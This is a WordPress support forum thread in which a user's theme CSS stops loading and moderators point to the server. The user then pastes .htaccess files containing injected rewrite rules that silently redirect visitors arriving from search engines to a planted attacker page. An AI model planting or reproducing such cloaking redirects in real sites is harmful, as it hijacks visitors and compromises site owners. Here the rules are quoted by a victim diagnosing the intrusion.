Title: CSS got hacked
Last modified: August 19, 2016

---

# CSS got hacked

 *  [dioni](https://wordpress.org/support/users/dioni/)
 * (@dioni)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/)
 * One of my blogs got hacked. The CSS is not displaying, including the one for 
   the admin dashboard. The files are all there. I reckon someone hacked the backend
   code somehow. I tried to clean up everything (delete and reinstall wordpress)
   twice, changed password, the hacker came back the next day. I tried to update
   to newest wordpress. I checked the permission on my .htaccess file and it’s fine.
   Anyone has experienced this before?
 * Site: [http://www.meexia.com/bookie](http://www.meexia.com/bookie)

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [garbonzo](https://wordpress.org/support/users/garbonzo/)
 * (@garbonzo)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710304)
 * I’m not so sure you got hacked… I should be able to download your css file and
   look at it, but I can’t. Maybe it’s missing?
 *  [moshu](https://wordpress.org/support/users/moshu/)
 * (@moshu)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710307)
 * The files all are NOT there – regardless what you think!
    [http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css](http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css)
   Not found. Take it from there…
 *  Thread Starter [dioni](https://wordpress.org/support/users/dioni/)
 * (@dioni)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710341)
 * Well yea that’s the problem. The file is there when I check it with ftp! With
   the right permission too (644), all folders with the right permission. Basically
   all my files are intact. But you can’t access it.
 *  Thread Starter [dioni](https://wordpress.org/support/users/dioni/)
 * (@dioni)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710365)
 * I meant you can’t access them from browsers (like what you tried). I checked 
   that all files have sensible size too (no 0 size).
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710370)
 * > _Basically all my files are intact. But you can’t access it._
 * Well, that’s not a hack, that is a server problem. You need to talk to your hosting
   service.
 *  Thread Starter [dioni](https://wordpress.org/support/users/dioni/)
 * (@dioni)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710388)
 * Well, I just don’t get how it worked one day and not the next day. It also works
   for a few of my wordpress sites and not for a couple of them (which I suspected
   got hacked) –> all hosted on the same server. Anybody can think of anything else?
 * Meanwhile I’ll try to talk with my hosting service. But I doubt that this is 
   the problem, because it DOES work with my other wordpress blogs (I have multiple
   wordpress installations on the server).
 * Note that initial installation worked fine. Then it got messed up the next day.
   Why would my host alter any files or the setting of ONE subfolder? (and without
   telling me) I have wordpress blogs on other folders and they’re all fine. And
   I’m using godaddy btw, so it should be quite reliable.
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710389)
 * If the file is there and has correct permissions, but you cannot access it through
   a web browser, then it’s some kind of problem with your server. It’s as simple
   as that. This has nothing to do with WordPress at all. You say the file exists,
   but the server returns a 404 error for it. That doesn’t go through WordPress 
   at all, that’s a simple “get a file through a webserver” thing.
 * Now, I use GoDaddy too, and they are everything *except* reliable in my experience.
   But, I have no idea why it doesn’t work for your case. I also have no idea why
   it would work one day and not the next. But I’ll lay it out quite clearly:
 * The CSS file should exist here:
    [http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css](http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css)
 * But it does not. That’s the problem. It’s a simple as that. Figure out why that
   link doesn’t pull up the CSS file, and the problem will be fixed.
 * BTW, what is the content of your .htaccess file in the bookie directory? Same
   goes for the main web root directory, what’s the .htaccess there? Perhaps you
   have something there that you should not have.
 *  Thread Starter [dioni](https://wordpress.org/support/users/dioni/)
 * (@dioni)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710501)
 * This is the content of my .htaccess in main directory:
    # a0b4df006e02184c60dbf503e71c87ad
   RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google
   |msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|
   alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|
   skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC] RewriteCond%{
   HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string
   |search_word|buscar|text|words|su|qt|rdata)\= RewriteCond %{HTTP_REFERER} ![?&](
   q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|
   buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22) RewriteCond %{TIME_SEC} <59 RewriteRule
   ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L] # a995d2cc661fa72452472e9554b5520c
 * This is the content of my .htaccess in bookie directory:
 * # BEGIN WordPress
    <IfModule mod_rewrite.c> RewriteEngine On RewriteBase /bookie/
   RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # a0b4df006e02184c60dbf503e71c87ad
   RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google
   |msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|
   alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|
   skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC] RewriteCond%{
   HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string
   |search_word|buscar|text|words|su|qt|rdata)\= RewriteCond %{HTTP_REFERER} ![?&](
   q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|
   buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22) RewriteCond %{TIME_SEC} <59 RewriteRule
   ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L] # a995d2cc661fa72452472e9554b5520c
 * RewriteRule . /bookie/index.php [L]
    </IfModule>
 * # END WordPress
 *  Thread Starter [dioni](https://wordpress.org/support/users/dioni/)
 * (@dioni)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710502)
 * Okay I just saw that this line looks very suspicious:
    RewriteRule ^.*$ /blog/
   wp-content/themes/squares/orelura/ex3/t.htm [L]
 * Many months ago I got a few emails from various people saying that my server 
   has been compromised and that it hosted some files attacking other people’s servers.
   I’ve deleted the folder and looks like it contains new files now (they’re different
   than the last ones). So I just deleted that folder again, and then delete the.
   htaccess file on /blog/ directory (cos the content looked suspicious too). I 
   wonder if that’s enough. I think it’s possible that there was some harmful file
   inside a wordpress theme that I put in.
 *  [syncbox](https://wordpress.org/support/users/syncbox/)
 * (@syncbox)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710503)
 * nevermind… I edited my comment. Godaddy, btw, STILL doesn’t offer the latest 
   version of WordPress… and I was the one that got them to go from 2.1.2 to 2.3.2(
   trying to get them to stay up-to-date)…
 * anyway, good luck with your issues… I got hacked once and I’ve been much more
   diligent about keeping WordPress up-to-date since.

Viewing 10 replies - 1 through 10 (of 10 total)

The topic ‘CSS got hacked’ is closed to new replies.

## Tags

 * [css](https://wordpress.org/support/topic-tag/css/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)

 * 10 replies
 * 5 participants
 * Last reply from: [syncbox](https://wordpress.org/support/users/syncbox/)
 * Last activity: [18 years, 3 months ago](https://wordpress.org/support/topic/css-got-hacked/#post-710503)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics